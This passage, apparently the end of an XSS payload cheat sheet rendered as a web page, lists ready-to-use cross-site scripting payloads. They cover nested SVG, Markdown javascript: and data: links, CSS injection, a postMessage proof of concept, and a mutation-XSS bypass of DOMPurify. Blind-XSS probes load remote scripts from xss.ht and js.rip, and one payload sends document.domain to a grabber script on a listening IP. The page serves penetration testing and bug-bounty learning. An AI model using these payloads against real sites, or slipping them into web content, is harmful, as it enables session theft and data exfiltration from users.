<a id="__codelineno-26-3" name="__codelineno-26-3" href="#__codelineno-26-3"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill: #002654&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-26-4" name="__codelineno-26-4" href="#__codelineno-26-4"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>alert(&#39;sub-svg<span class="w"> </span>1&#39;);<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-26-5" name="__codelineno-26-5" href="#__codelineno-26-5"></a><span class="w"> </span><span class="nt">&lt;/svg&gt;</span>
<a id="__codelineno-26-6" name="__codelineno-26-6" href="#__codelineno-26-6"></a><span class="w"> </span><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;200&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-26-7" name="__codelineno-26-7" href="#__codelineno-26-7"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill: #ED2939&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-26-8" name="__codelineno-26-8" href="#__codelineno-26-8"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>alert(&#39;sub-svg<span class="w"> </span>2&#39;);<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-26-9" name="__codelineno-26-9" href="#__codelineno-26-9"></a><span class="w"> </span><span class="nt">&lt;/svg&gt;</span>
<a id="__codelineno-26-10" name="__codelineno-26-10" href="#__codelineno-26-10"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<h3 id="xss-in-markdown">XSS in Markdown</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="na">[a]</span><span class="p">(</span><span class="n">javascript</span><span class="p">:</span><span class="n">prompt</span><span class="p">(</span><span class="n">document</span><span class="p">.</span><span class="n">cookie</span><span class="p">))</span>
<a id="__codelineno-27-2" name="__codelineno-27-2" href="#__codelineno-27-2"></a><span class="na">[a]</span><span class="p">(</span><span class="n">j</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">v</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="n">c</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="n">t</span><span class="p">:</span><span class="n">prompt</span><span class="p">(</span><span class="n">document</span><span class="p">.</span><span class="n">cookie</span><span class="p">))</span>
<a id="__codelineno-27-3" name="__codelineno-27-3" href="#__codelineno-27-3"></a><span class="na">[a]</span><span class="p">(</span><span class="n">data</span><span class="p">:</span><span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">;</span><span class="n">base64</span><span class="p">,</span><span class="n">PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K</span><span class="p">)</span>
<a id="__codelineno-27-4" name="__codelineno-27-4" href="#__codelineno-27-4"></a><span class="na">[a]</span><span class="p">(</span><span class="n">javascript</span><span class="p">:</span><span class="n">window</span><span class="p">.</span><span class="n">onerror</span><span class="o">=</span><span class="n">alert</span><span class="p">;</span><span class="k">throw</span><span class="o">%</span><span class="mi">201</span><span class="p">)</span>
</code></pre></div>
<h3 id="xss-in-css">XSS in CSS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="cp">&lt;!DOCTYPE html&gt;</span>
<a id="__codelineno-28-2" name="__codelineno-28-2" href="#__codelineno-28-2"></a><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span>
<a id="__codelineno-28-3" name="__codelineno-28-3" href="#__codelineno-28-3"></a><span class="p">&lt;</span><span class="nt">head</span><span class="p">&gt;</span>
<a id="__codelineno-28-4" name="__codelineno-28-4" href="#__codelineno-28-4"></a><span class="p">&lt;</span><span class="nt">style</span><span class="p">&gt;</span>
<a id="__codelineno-28-5" name="__codelineno-28-5" href="#__codelineno-28-5"></a><span class="nt">div</span><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-28-6" name="__codelineno-28-6" href="#__codelineno-28-6"></a><span class="w"> </span><span class="k">background-image</span><span class="p">:</span><span class="w"> </span><span class="nb">url</span><span class="p">(</span><span class="s2">&quot;data:image/jpg;base64,&lt;\/style&gt;&lt;svg/onload=alert(document.domain)&gt;&quot;</span><span class="p">);</span>
<a id="__codelineno-28-7" name="__codelineno-28-7" href="#__codelineno-28-7"></a><span class="w"> </span><span class="k">background-color</span><span class="p">:</span><span class="w"> </span><span class="mh">#cccccc</span><span class="p">;</span>
<a id="__codelineno-28-8" name="__codelineno-28-8" href="#__codelineno-28-8"></a><span class="p">}</span>
<a id="__codelineno-28-9" name="__codelineno-28-9" href="#__codelineno-28-9"></a><span class="p">&lt;/</span><span class="nt">style</span><span class="p">&gt;</span>
<a id="__codelineno-28-10" name="__codelineno-28-10" href="#__codelineno-28-10"></a><span class="p">&lt;/</span><span class="nt">head</span><span class="p">&gt;</span>
<a id="__codelineno-28-11" name="__codelineno-28-11" href="#__codelineno-28-11"></a> <span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-28-12" name="__codelineno-28-12" href="#__codelineno-28-12"></a> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span>lol<span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span>
<a id="__codelineno-28-13" name="__codelineno-28-13" href="#__codelineno-28-13"></a> <span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-28-14" name="__codelineno-28-14" href="#__codelineno-28-14"></a><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span>
</code></pre></div>
<h2 id="xss-in-postmessage">XSS in PostMessage</h2>
<blockquote>
<p>If the target origin is asterisk * the message can be sent to any domain has reference to the child page.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">button</span> <span class="na">value</span><span class="o">=</span><span class="s">&quot;Click Me&quot;</span> <span class="na">id</span><span class="o">=</span><span class="s">&quot;btn&quot;</span><span class="p">&gt;</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">&#39;btn&#39;</span><span class="p">).</span><span class="nx">onclick</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">poc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s1">&#39;http://www.redacted.com/#login&#39;</span><span class="p">);</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="w"> </span><span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">poc</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a><span class="w"> </span><span class="s2">&quot;sender&quot;</span><span class="o">:</span><span class="w"> </span><span class="s2">&quot;accounts&quot;</span><span class="p">,</span>
<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="w"> </span><span class="s2">&quot;url&quot;</span><span class="o">:</span><span class="w"> </span><span class="s2">&quot;javascript:confirm(&#39;XSS&#39;)&quot;</span><span class="p">,</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a><span class="w"> </span><span class="p">},</span>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a><span class="w"> </span><span class="s1">&#39;*&#39;</span>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="w"> </span><span class="p">);</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="mf">2000</span><span class="p">);</span>
<a id="__codelineno-29-18" name="__codelineno-29-18" href="#__codelineno-29-18"></a><span class="p">}</span>
<a id="__codelineno-29-19" name="__codelineno-29-19" href="#__codelineno-29-19"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-29-20" name="__codelineno-29-20" href="#__codelineno-29-20"></a><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span>
</code></pre></div>
<h2 id="blind-xss">Blind XSS</h2>
<h3 id="xss-hunter">XSS Hunter</h3>
<blockquote>
<p>XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.</p>
</blockquote>
<p>XSS Hunter is deprecated, it was available at <a href="https://xsshunter.com/app">https://xsshunter.com/app</a>. </p>
<p>You can set up an alternative version </p>
<ul>
<li>Self-hosted version from <a href="https://github.com/mandatoryprogrammer/xsshunter-express">mandatoryprogrammer/xsshunter-express</a></li>
<li>Hosted on <a href="https://xsshunter.trufflesecurity.com/">xsshunter.trufflesecurity.com</a></li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a>&quot;&gt;<span class="nt">&lt;script</span><span class="w"> </span><span class="na">src=</span><span class="s">&quot;https://js.rip/&lt;custom.name&gt;&quot;</span><span class="nt">&gt;&lt;/script&gt;</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a>&quot;&gt;<span class="nt">&lt;script</span><span class="w"> </span><span class="na">src=</span><span class="s">//&lt;custom.subdomain</span><span class="nt">&gt;</span>.xss.ht&gt;<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="nt">&lt;script&gt;</span>$.getScript(&quot;//<span class="nt">&lt;custom.subdomain&gt;</span>.xss.ht&quot;)<span class="nt">&lt;/script&gt;</span>
</code></pre></div>
<h3 id="other-blind-xss-tools">Other Blind XSS tools</h3>
<ul>
<li><a href="https://github.com/Netflix-Skunkworks/sleepy-puppy">Netflix-Skunkworks/sleepy-puppy</a> - Sleepy Puppy XSS Payload Management Framework</li>
<li><a href="https://github.com/LewisArdern/bXSS">LewisArdern/bXSS</a> - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting. </li>
<li><a href="https://github.com/ssl/ezXSS">ssl/ezXSS</a> - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. </li>
</ul>
<h3 id="blind-xss-endpoint">Blind XSS endpoint</h3>
<ul>
<li>Contact forms</li>
<li>Ticket support</li>
<li>Referer Header</li>
<li>Custom Site Analytics</li>
<li>Administrative Panel logs</li>
<li>User Agent</li>
<li>Custom Site Analytics</li>
<li>Administrative Panel logs</li>
<li>Comment Box</li>
<li>Administrative Panel</li>
</ul>
<h3 id="tips">Tips</h3>
<p>You can use a <a href="#data-grabber-for-xss">Data grabber for XSS</a> and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.</p>
<p>Eg. payload</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://10.10.14.30:8080/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>Eg. one-line HTTP server:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="p">$</span> <span class="n">ruby</span> <span class="n">-run</span> <span class="n">-ehttpd</span> <span class="p">.</span> <span class="n">-p8080</span>
</code></pre></div>
<h2 id="mutated-xss">Mutated XSS</h2>
<p>Use browsers quirks to recreate some HTML tags.</p>
<p><strong>Example</strong>: Mutated XSS from Masato Kinugawa, used against <a href="https://github.com/cure53/DOMPurify">cure53/DOMPurify</a> component on Google Search. </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="o">&lt;</span><span class="nx">noscript</span><span class="o">&gt;&lt;</span><span class="nx">p</span><span class="w"> </span><span class="nx">title</span><span class="o">=</span><span class="s2">&quot;&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;&quot;</span><span class="o">&gt;</span>
</code></pre></div>
<p>Technical blogposts available at</p>
<ul>
<li>https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/</li>
<li>https://research.securitum.com/dompurify-bypass-using-mxss/</li>
</ul>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/all-labs#cross-site-scripting">PortSwigger Labs for XSS</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected">Root Me - XSS - Reflected</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side">Root Me - XSS - Server Side</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1">Root Me - XSS - Stored 1</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2">Root Me - XSS - Stored 2</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass">Root Me - XSS - Stored - Filter Bypass</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction">Root Me - XSS DOM Based - Introduction</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS">Root Me - XSS DOM Based - AngularJS</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval">Root Me - XSS DOM Based - Eval</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass">Root Me - XSS DOM Based - Filters Bypass</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based">Root Me - XSS - DOM Based</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets">Root Me - Self XSS - DOM Secrets</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition">Root Me - Self XSS - Race Condition</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="http://mksben.l0.cm/2016/07/xxn-caret.html">Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) - Masato Kinugawa's (@kinugawamasato) - July 15, 2016</a></li>
<li><a href="https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss">Account Recovery XSS - Gábor Molnár - April 13, 2016</a></li>
<li><a href="https://whitton.io/articles/xss-on-facebook-via-png-content-types/">An XSS on Facebook via PNGs &amp; Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016</a></li>
<li><a href="https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code">Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020</a></li>
<li><a href="http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html">Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016</a></li>
<li><a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019</a></li>
<li><a href="https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/">Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024</a></li>
<li><a href="http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html">Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015</a></li>
<li><a href="https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/">Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013</a></li>
<li><a href="https://labs.detectify.com/2015/06/06/google-xss-turkey/">Google XSS Turkey - Frans Rosén - June 6, 2015</a></li>
<li><a href="https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g">How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017</a></li>
<li><a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf">Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012</a></li>
<li><a href="https://cure53.de/fp170.pdf">mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013</a></li>
<li><a href="https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/">postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016</a></li>
<li><a href="https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/">RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016</a></li>
<li><a href="https://youtu.be/Sm4G6cAHjWM">Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024</a></li>
<li><a href="https://hackerone.com/reports/207042">Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017</a></li>
<li><a href="https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/">Stored XSS affecting all fantasy sports [*.fantasysports.yahoo.com] - thedawgyg - December 7, 2016</a></li>
<li><a href="https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/">Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013</a></li>
<li><a href="http://web.archive.org/web/20130420095223/http://www.breaksec.com/?p=6129">Stored XSS In Facebook Chat, Check In, Facebook Messenger - Nirgoldshlager - April 17, 2013</a></li>
<li><a href="https://hackerone.com/reports/152067">Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016</a></li>
<li><a href="https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd">Stored XSS on Snapchat - Mrityunjoy - February 9, 2018</a></li>
<li><a href="https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html">Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018</a></li>
<li><a href="https://hackerone.com/reports/150179">Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016</a></li>
<li><a href="https://hackerone.com/reports/260744">Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017</a></li>
<li><a href="https://whitton.io/articles/uber-turning-self-xss-into-good-xss/">Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016</a></li>
<li><a href="https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html">Uber Self XSS to Global XSS - httpsonly - August 29, 2016</a></li>
<li><a href="https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot">Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018</a></li>
<li><a href="http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify">Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016</a></li>
<li><a href="https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309">Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018</a></li>
<li><a href="https://wesecureapp.com/blog/xss-by-tossing-cookies/">XSS by Tossing Cookies - WeSecureApp - July 10, 2017</a></li>
<li><a href="http://d3adend.org/xss/ghettoBypass">XSS ghettoBypass - d3adend - September 25, 2015</a></li>
<li><a href="http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/">XSS in Uber via Cookie - zhchbin - August 30, 2017</a></li>
<li><a href="https://hackerone.com/reports/231053">XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017</a></li>
<li><a href="http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html">XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015</a></li>
<li><a href="http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html">Xssing Web With Unicodes - Rakesh Mane - August 3, 2017</a></li>
<li><a href="https://klikki.fi/adv/yahoo.html">Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016</a></li>
<li><a href="https://klikki.fi/adv/yahoo2.html">Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 30, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
<script defer src="https://cloud.umami.is/script.js" data-website-id="82be5164-e1f3-4cb0-bd22-20e02086d3d4"></script>
</div>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.88dd0f4e.min.js"></script>
</body>
</html>
Reference in New Issue Copy Permalink